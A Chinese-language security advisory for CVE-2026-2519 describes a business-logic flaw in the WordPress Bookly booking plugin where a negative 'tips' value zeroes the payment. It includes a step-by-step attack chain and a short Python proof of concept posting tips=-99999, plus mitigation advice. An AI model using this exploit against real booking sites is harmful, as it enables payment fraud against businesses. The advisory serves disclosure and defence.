CVE-2026-2519 CVSS 5.3 中危

CVE-2026-2519 WordPress Bookly插件价格操纵漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-2519

漏洞类型

业务逻辑漏洞

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress Bookly Plugin (Online Scheduling and Appointment Booking System)

漏洞概述

WordPress Bookly插件在27.0及以下版本中存在严重的安全漏洞。由于插件在服务器端未对用户提供的'tips'参数进行充分验证，攻击者可利用此缺陷操纵服务价格。未经身份验证的攻击者能够通过提交负数作为小费金额，导致总支付金额被强制降为零，从而免费获取预约服务。

技术细节

该漏洞源于Bookly插件在处理预约请求时的业务逻辑缺陷。插件直接信任前端传递的'tips'参数，并将其纳入总价计算，而未在服务器端进行非负数或范围校验。攻击者可以通过拦截并修改发送至服务器的AJAX请求（通常位于`/bookly-responsive-appointment-booking-tool/frontend/modules/booking/Ajax.php`），将`tips`字段的值修改为负数（例如-100）。由于未经验证，服务器在计算总价时会直接加上这个负值，从而抵消原本的服务费用，实现以零成本完成预约。这属于典型的业务逻辑绕过漏洞，无需用户认证即可利用。

攻击链分析

STEP 1

侦察

识别使用WordPress Bookly插件的目标网站，确认插件版本低于或等于27.0。

STEP 2

拦截请求

在用户进行预约流程时，使用Burp Suite或类似工具拦截发送至服务器的AJAX请求。

STEP 3

篡改参数

将请求中的'tips'参数值修改为一个大的负数（例如与总价相等的负数）。

STEP 4

发送请求

转发篡改后的请求到服务器。

STEP 5

完成利用

服务器端未验证负数，直接计算总价，导致最终应付金额为零，攻击者成功以零成本预约。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL example (adjust based on actual target)
target_url = "https://example.com/wp-admin/admin-ajax.php"

# The vulnerability allows manipulating the 'tips' parameter
# Submitting a negative value reduces the total price to zero
payload = {
    "action": "bookly_pro_post_booking", # Action name might vary
    "form_id": "1",
    "tips": "-99999",  # Malicious payload: Negative tip
    "service_id": "1",
    "staff_id": "1",
    "start_date": "2026-05-01",
    "start_time": "10:00"
}

try:
    response = requests.post(target_url, data=payload)
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")
    if "total_price" in response.text or "0.00" in response.text:
        print("Exploit successful: Total price likely reduced.")
except Exception as e:
    print(f"Error occurred: {e}")

影响范围

Bookly <= 27.0

防御指南

临时缓解措施

建议立即检查并升级WordPress Bookly插件到最新安全版本。在升级前，管理员应暂时禁用插件的在线支付功能或小费功能，或者通过WAF拦截包含负数值的'tips'参数请求，以防止被恶意利用造成经济损失。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表